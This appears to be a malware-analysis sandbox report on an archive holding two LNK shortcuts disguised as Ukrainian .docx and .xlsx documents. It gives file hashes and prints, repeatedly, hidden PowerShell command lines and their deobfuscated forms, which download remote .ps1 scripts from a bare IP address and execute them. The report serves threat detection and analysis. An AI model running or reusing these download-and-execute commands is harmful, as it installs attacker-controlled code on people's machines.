Malicious
Malicious
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
230888af63fe269a3ff7a79ca6b5cf2f
Sha1
2d10c9666c6e73c7fcd69b673c47d3d4e759113e
Sha256
e466e80fd69cf939b7dd29524b5b6001be7ae4709619c8eef69bb49329b1152d
Sha384
191cb8baf57acf161bc713b9ddc335627edbe06b12c21765adff3cf0286cd3be37d88370f9c298e42ca3df386a4f2413
Sha512
0d3c8c7acf00a5b7a813aaf03220d9b019e796cf5bcd5e0f401b4aabb3f9a113ae1d95b9f9c8f09e5f59e5c48d87c1887e70950a9e2bed9eb1c662027be73140
SSDeep
48:mTPbpf8RDKEPS8pdNZZpEbpf8v28fKEPS8i7dNZ8tTog4:mTDpfV8ypfy2X8iiTN4
TLSH
13D3B87076F56B14F0B65ABCAE76268999367A18DB33C74C0114A24E2A30F14DD15B3B
File Structure
230888af63fe269a3ff7a79ca6b5cf2f
Malicious
Розпорядження.docx.lnk
Malicious
LNK CommandLine
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[Deobfuscated PS]
Malicious
ШПС.xlsx.lnk
Malicious
LNK CommandLine
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe -w Hidden .([ScriptBlock]::Create((New-Object Net.WebClient | ForEach-Object { $_.Headers.Add('User-Agent','UA WindowsPowerShell'); $_.DownloadString('http://5.101.85.47/bldnsh/chafefantastic.ps1') })))
LNK: Command Execution

powershell.exe -w Hidden .([ScriptBlock]::Create((New-Object Net.WebClient | ForEach-Object { $_.Headers.Add('User-Agent','UA WindowsPowerShell'); $_.DownloadString('http://5.101.85.47/bldnsh/signalroot.ps1') })))
Deobfuscated PowerShell

-w "Hidden" "." ([ScriptBlock]::"Create"((New-Object "Net.WebClient" | ForEach-Object $_."Headers"."Add"("User-Agent", "UA WindowsPowerShell") $_."DownloadString"("http://5.101.85.47/bldnsh/chafefantastic.ps1"))))
Deobfuscated PowerShell

-w "Hidden" "." ([ScriptBlock]::"Create"((New-Object "Net.WebClient" | ForEach-Object $_."Headers"."Add"("User-Agent", "UA WindowsPowerShell") $_."DownloadString"("http://5.101.85.47/bldnsh/signalroot.ps1"))))
230888af63fe269a3ff7a79ca6b5cf2f (135.16 KB)
File Structure
230888af63fe269a3ff7a79ca6b5cf2f
Malicious
Розпорядження.docx.lnk
Malicious
LNK CommandLine
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[Deobfuscated PS]
Malicious
ШПС.xlsx.lnk
Malicious
LNK CommandLine
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[Deobfuscated PS]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

powershell.exe -w Hidden .([ScriptBlock]::Create((New-Object Net.WebClient | ForEach-Object { $_.Headers.Add('User-Agent','UA WindowsPowerShell'); $_.DownloadString('http://5.101.85.47/bldnsh/chafefantastic.ps1') })))

Malicious

230888af63fe269a3ff7a79ca6b5cf2f > ШПС.xlsx.lnk
LNK: Command Execution

powershell.exe -w Hidden .([ScriptBlock]::Create((New-Object Net.WebClient | ForEach-Object { $_.Headers.Add('User-Agent','UA WindowsPowerShell'); $_.DownloadString('http://5.101.85.47/bldnsh/signalroot.ps1') })))

Malicious

230888af63fe269a3ff7a79ca6b5cf2f > Розпорядження.docx.lnk
Deobfuscated PowerShell

-w "Hidden" "." ([ScriptBlock]::"Create"((New-Object "Net.WebClient" | ForEach-Object $_."Headers"."Add"("User-Agent", "UA WindowsPowerShell") $_."DownloadString"("http://5.101.85.47/bldnsh/chafefantastic.ps1"))))

Malicious

230888af63fe269a3ff7a79ca6b5cf2f > ШПС.xlsx.lnk > LNK CommandLine
Deobfuscated PowerShell

-w "Hidden" "." ([ScriptBlock]::"Create"((New-Object "Net.WebClient" | ForEach-Object $_."Headers"."Add"("User-Agent", "UA WindowsPowerShell") $_."DownloadString"("http://5.101.85.47/bldnsh/signalroot.ps1"))))

Malicious

230888af63fe269a3ff7a79ca6b5cf2f > Розпорядження.docx.lnk > LNK CommandLine
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙